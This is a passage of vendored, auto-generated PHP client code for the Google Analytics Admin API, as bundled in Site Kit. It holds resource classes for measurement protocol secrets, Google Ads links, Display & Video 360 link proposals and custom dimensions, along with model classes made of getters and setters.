@return GoogleProtobufEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lookup for a single "GA4" MeasurementProtocolSecret. * (measurementProtocolSecrets.get) * * @param string $name Required. The name of the measurement protocol secret to * lookup. Format: properties/{property}/webDataStreams/{webDataStream}/measurem * entProtocolSecrets/{measurementProtocolSecret} Note: Any type of stream * (WebDataStream, IosAppDataStream, AndroidAppDataStream) may be a parent. * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class); } /** * Returns child MeasurementProtocolSecrets under the specified parent Property. * (measurementProtocolSecrets.listPropertiesAndroidAppDataStreamsMeasurementPro * tocolSecrets) * * @param string $parent Required. The resource name of the parent stream. Any * type of stream (WebDataStream, IosAppDataStream, AndroidAppDataStream) may be * a parent. Format: properties/{property}/webDataStreams/{webDataStream}/measur * ementProtocolSecrets * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 10 resources will be returned. The maximum value is 10. * Higher values will be coerced to the maximum. * @opt_param string pageToken A page token, received from a previous * `ListMeasurementProtocolSecrets` call. Provide this to retrieve the * subsequent page. When paginating, all other parameters provided to * `ListMeasurementProtocolSecrets` must match the call that provided the page * token. * @return GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse */ public function listPropertiesAndroidAppDataStreamsMeasurementProtocolSecrets($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse::class); } /** * Updates a measurement protocol secret. (measurementProtocolSecrets.patch) * * @param string $name Output only. Resource name of this secret. This secret * may be a child of any type of stream. Format: properties/{property}/webDataSt * reams/{webDataStream}/measurementProtocolSecrets/{measurementProtocolSecret} * @param GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask The list of fields to be updated. Omitted fields * will not be updated. * @return GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesAndroidAppDataStreamsMeasurementProtocolSecrets::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesAndroidAppDataStreamsMeasurementProtocolSecrets'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaGoogleAdsLink; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListGoogleAdsLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "googleAdsLinks" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $googleAdsLinks = $analyticsadminService->properties_googleAdsLinks; * </code> */ class PropertiesGoogleAdsLinks extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a GoogleAdsLink. (googleAdsLinks.create) * * @param string $parent Required. Example format: properties/1234 * @param GoogleAnalyticsAdminV1betaGoogleAdsLink $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaGoogleAdsLink * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaGoogleAdsLink $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaGoogleAdsLink::class); } /** * Deletes a GoogleAdsLink on a property (googleAdsLinks.delete) * * @param string $name Required. Example format: * properties/1234/googleAdsLinks/5678 * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty * @throws \Google\Service\Exception */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lists GoogleAdsLinks on a property. * (googleAdsLinks.listPropertiesGoogleAdsLinks) * * @param string $parent Required. Example format: properties/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200 * (higher values will be coerced to the maximum). * @opt_param string pageToken A page token, received from a previous * `ListGoogleAdsLinks` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListGoogleAdsLinks` must match * the call that provided the page token. * @return GoogleAnalyticsAdminV1betaListGoogleAdsLinksResponse * @throws \Google\Service\Exception */ public function listPropertiesGoogleAdsLinks($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListGoogleAdsLinksResponse::class); } /** * Updates a GoogleAdsLink on a property (googleAdsLinks.patch) * * @param string $name Output only. Format: * properties/{propertyId}/googleAdsLinks/{googleAdsLinkId} Note: * googleAdsLinkId is not the Google Ads customer ID. * @param GoogleAnalyticsAdminV1betaGoogleAdsLink $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Field names must be in snake case (e.g., "field_to_update"). Omitted fields * will not be updated. To replace the entire entity, use one path with the * string "*" to match all fields. * @return GoogleAnalyticsAdminV1betaGoogleAdsLink * @throws \Google\Service\Exception */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaGoogleAdsLink $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaGoogleAdsLink::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesGoogleAdsLinks::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesGoogleAdsLinks'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCancelDisplayVideo360AdvertiserLinkProposalRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinkProposalsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "displayVideo360AdvertiserLinkProposals" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $displayVideo360AdvertiserLinkProposals = $analyticsadminService->displayVideo360AdvertiserLinkProposals; * </code> */ class PropertiesDisplayVideo360AdvertiserLinkProposals extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Approves a DisplayVideo360AdvertiserLinkProposal. The * DisplayVideo360AdvertiserLinkProposal will be deleted and a new * DisplayVideo360AdvertiserLink will be created. * (displayVideo360AdvertiserLinkProposals.approve) * * @param string $name Required. The name of the * DisplayVideo360AdvertiserLinkProposal to approve. Example format: * properties/1234/displayVideo360AdvertiserLinkProposals/5678 * @param GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalResponse */ public function approve($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalRequest $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('approve', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalResponse::class); } /** * Cancels a DisplayVideo360AdvertiserLinkProposal. Cancelling can mean either: * - Declining a proposal initiated from Display & Video 360 - Withdrawing a * proposal initiated from Google Analytics After being cancelled, a proposal * will eventually be deleted automatically. * (displayVideo360AdvertiserLinkProposals.cancel) * * @param string $name Required. The name of the * DisplayVideo360AdvertiserLinkProposal to cancel. Example format: * properties/1234/displayVideo360AdvertiserLinkProposals/5678 * @param GoogleAnalyticsAdminV1alphaCancelDisplayVideo360AdvertiserLinkProposalRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal */ public function cancel($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCancelDisplayVideo360AdvertiserLinkProposalRequest $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('cancel', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal::class); } /** * Creates a DisplayVideo360AdvertiserLinkProposal. * (displayVideo360AdvertiserLinkProposals.create) * * @param string $parent Required. Example format: properties/1234 * @param GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal::class); } /** * Deletes a DisplayVideo360AdvertiserLinkProposal on a property. This can only * be used on cancelled proposals. * (displayVideo360AdvertiserLinkProposals.delete) * * @param string $name Required. The name of the * DisplayVideo360AdvertiserLinkProposal to delete. Example format: * properties/1234/displayVideo360AdvertiserLinkProposals/5678 * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lookup for a single DisplayVideo360AdvertiserLinkProposal. * (displayVideo360AdvertiserLinkProposals.get) * * @param string $name Required. The name of the * DisplayVideo360AdvertiserLinkProposal to get. Example format: * properties/1234/displayVideo360AdvertiserLinkProposals/5678 * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal::class); } /** * Lists DisplayVideo360AdvertiserLinkProposals on a property. (displayVideo360A * dvertiserLinkProposals.listPropertiesDisplayVideo360AdvertiserLinkProposals) * * @param string $parent Required. Example format: properties/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200 * (higher values will be coerced to the maximum). * @opt_param string pageToken A page token, received from a previous * `ListDisplayVideo360AdvertiserLinkProposals` call. Provide this to retrieve * the subsequent page. When paginating, all other parameters provided to * `ListDisplayVideo360AdvertiserLinkProposals` must match the call that * provided the page token. * @return GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinkProposalsResponse */ public function listPropertiesDisplayVideo360AdvertiserLinkProposals($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinkProposalsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesDisplayVideo360AdvertiserLinkProposals::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesDisplayVideo360AdvertiserLinkProposals'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaArchiveCustomDimensionRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomDimension; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListCustomDimensionsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "customDimensions" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $customDimensions = $analyticsadminService->properties_customDimensions; * </code> */ class PropertiesCustomDimensions extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Archives a CustomDimension on a property. (customDimensions.archive) * * @param string $name Required. The name of the CustomDimension to archive. * Example format: properties/1234/customDimensions/5678 * @param GoogleAnalyticsAdminV1betaArchiveCustomDimensionRequest $postBody * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty * @throws \Google\Service\Exception */ public function archive($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaArchiveCustomDimensionRequest $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('archive', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Creates a CustomDimension. (customDimensions.create) * * @param string $parent Required. Example format: properties/1234 * @param GoogleAnalyticsAdminV1betaCustomDimension $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaCustomDimension * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomDimension $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomDimension::class); } /** * Lookup for a single CustomDimension. (customDimensions.get) * * @param string $name Required. The name of the CustomDimension to get. Example * format: properties/1234/customDimensions/5678 * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaCustomDimension * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomDimension::class); } /** * Lists CustomDimensions on a property. * (customDimensions.listPropertiesCustomDimensions) * * @param string $parent Required. Example format: properties/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200 * (higher values will be coerced to the maximum). * @opt_param string pageToken A page token, received from a previous * `ListCustomDimensions` call. Provide this to retrieve the subsequent page. * When paginating, all other parameters provided to `ListCustomDimensions` must * match the call that provided the page token. * @return GoogleAnalyticsAdminV1betaListCustomDimensionsResponse * @throws \Google\Service\Exception */ public function listPropertiesCustomDimensions($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListCustomDimensionsResponse::class); } /** * Updates a CustomDimension on a property. (customDimensions.patch) * * @param string $name Output only. Resource name for this CustomDimension * resource. Format: properties/{property}/customDimensions/{customDimension} * @param GoogleAnalyticsAdminV1betaCustomDimension $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Omitted fields will not be updated. To replace the entire entity, use one * path with the string "*" to match all fields. * @return GoogleAnalyticsAdminV1betaCustomDimension * @throws \Google\Service\Exception */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomDimension $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomDimension::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesCustomDimensions::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesCustomDimensions'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccountSummary extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'propertySummaries'; /** * @var string */ public $account; /** * @var string */ public $displayName; /** * @var string */ public $name; protected $propertySummariesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaPropertySummary::class; protected $propertySummariesDataType = 'array'; /** * @param string */ public function setAccount($account) { $this->account = $account; } /** * @return string */ public function getAccount() { return $this->account; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param GoogleAnalyticsAdminV1alphaPropertySummary[] */ public function setPropertySummaries($propertySummaries) { $this->propertySummaries = $propertySummaries; } /** * @return GoogleAnalyticsAdminV1alphaPropertySummary[] */ public function getPropertySummaries() { return $this->propertySummaries; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccountSummary::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccountSummary'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaProvisionAccountTicketRequest extends \Google\Site_Kit_Dependencies\Google\Model { protected $accountType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccount::class; protected $accountDataType = ''; /** * @var string */ public $redirectUri; /** * @param GoogleAnalyticsAdminV1alphaAccount */ public function setAccount(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccount $account) { $this->account = $account; } /** * @return GoogleAnalyticsAdminV1alphaAccount */ public function getAccount() { return $this->account; } /** * @param string */ public function setRedirectUri($redirectUri) { $this->redirectUri = $redirectUri; } /** * @return string */ public function getRedirectUri() { return $this->redirectUri; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaProvisionAccountTicketRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaProvisionAccountTicketRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleProtobufEmpty extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleProtobufEmpty'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $adsPersonalizationEnabled; /** * @var string */ public $advertiserDisplayName; /** * @var string */ public $advertiserId; /** * @var bool */ public $campaignDataSharingEnabled; /** * @var bool */ public $costDataSharingEnabled; protected $linkProposalStatusDetailsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaLinkProposalStatusDetails::class; protected $linkProposalStatusDetailsDataType = ''; /** * @var string */ public $name; /** * @var string */ public $validationEmail; /** * @param bool */ public function setAdsPersonalizationEnabled($adsPersonalizationEnabled) { $this->adsPersonalizationEnabled = $adsPersonalizationEnabled; } /** * @return bool */ public function getAdsPersonalizationEnabled() { return $this->adsPersonalizationEnabled; } /** * @param string */ public function setAdvertiserDisplayName($advertiserDisplayName) { $this->advertiserDisplayName = $advertiserDisplayName; } /** * @return string */ public function getAdvertiserDisplayName() { return $this->advertiserDisplayName; } /** * @param string */ public function setAdvertiserId($advertiserId) { $this->advertiserId = $advertiserId; } /** * @return string */ public function getAdvertiserId() { return $this->advertiserId; } /** * @param bool */ public function setCampaignDataSharingEnabled($campaignDataSharingEnabled) { $this->campaignDataSharingEnabled = $campaignDataSharingEnabled; } /** * @return bool */ public function getCampaignDataSharingEnabled() { return $this->campaignDataSharingEnabled; } /** * @param bool */ public function setCostDataSharingEnabled($costDataSharingEnabled) { $this->costDataSharingEnabled = $costDataSharingEnabled; } /** * @return bool */ public function getCostDataSharingEnabled() { return $this->costDataSharingEnabled; } /** * @param GoogleAnalyticsAdminV1alphaLinkProposalStatusDetails */ public function setLinkProposalStatusDetails(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaLinkProposalStatusDetails $linkProposalStatusDetails) { $this->linkProposalStatusDetails = $linkProposalStatusDetails; } /** * @return GoogleAnalyticsAdminV1alphaLinkProposalStatusDetails */ public function getLinkProposalStatusDetails() { return $this->linkProposalStatusDetails; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setValidationEmail($validationEmail) { $this->validationEmail = $validationEmail; } /** * @return string */ public function getValidationEmail() { return $this->validationEmail; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaRunAccessReportResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'rows'; protected $dimensionHeadersType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessDimensionHeader::class; protected $dimensionHeadersDataType = 'array'; protected $metricHeadersType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessMetricHeader::class; protected $metricHeadersDataType = 'array'; protected $quotaType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuota::class; protected $quotaDataType = ''; /** * @var int */ public $rowCount; protected $rowsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessRow::class; protected $rowsDataType = 'array'; /** * @param GoogleAnalyticsAdminV1betaAccessDimensionHeader[] */ public function setDimensionHeaders($dimensionHeaders) { $this->dimensionHeaders = $dimensionHeaders; } /** * @return GoogleAnalyticsAdminV1betaAccessDimensionHeader[] */ public function getDimensionHeaders() { return $this->dimensionHeaders; } /** * @param GoogleAnalyticsAdminV1betaAccessMetricHeader[] */ public function setMetricHeaders($metricHeaders) { $this->metricHeaders = $metricHeaders; } /** * @return GoogleAnalyticsAdminV1betaAccessMetricHeader[] */ public function getMetricHeaders() { return $this->metricHeaders; } /** * @param GoogleAnalyticsAdminV1betaAccessQuota */ public function setQuota(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuota $quota) { $this->quota = $quota; } /** * @return GoogleAnalyticsAdminV1betaAccessQuota */ public function getQuota() { return $this->quota; } /** * @param int */ public 